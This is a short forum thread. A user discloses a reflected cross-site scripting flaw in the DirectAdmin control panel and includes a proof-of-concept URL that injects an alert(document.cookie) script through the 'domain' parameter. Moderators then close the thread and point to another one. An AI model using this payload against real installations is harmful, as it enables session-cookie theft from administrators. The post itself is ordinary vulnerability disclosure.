XSS Attack On DirectAdmin

[AKIN]

? Tested On: http://www.directadmin.com/demo.html



? Proof of Concept:

LOCAL XSS attack:

http://www.directadmin.com:2222/HTM_PASSWD?domain=".><script>alert(document.cookie)</script><!--





?Solution:

?contact [email protected]

 

[Aspegic]

This topic is being discussed in this thread:
http://www.directadmin.com/forum/showthread.php?s=&threadid=13152

To prevent information on this topic from being scattered throughout the forum I recommend to continue the discussion in the other thread.

Thanks!

 

[nobaloney]

This thread is now closed. Please use the other thread for any continued discussion.

Jeff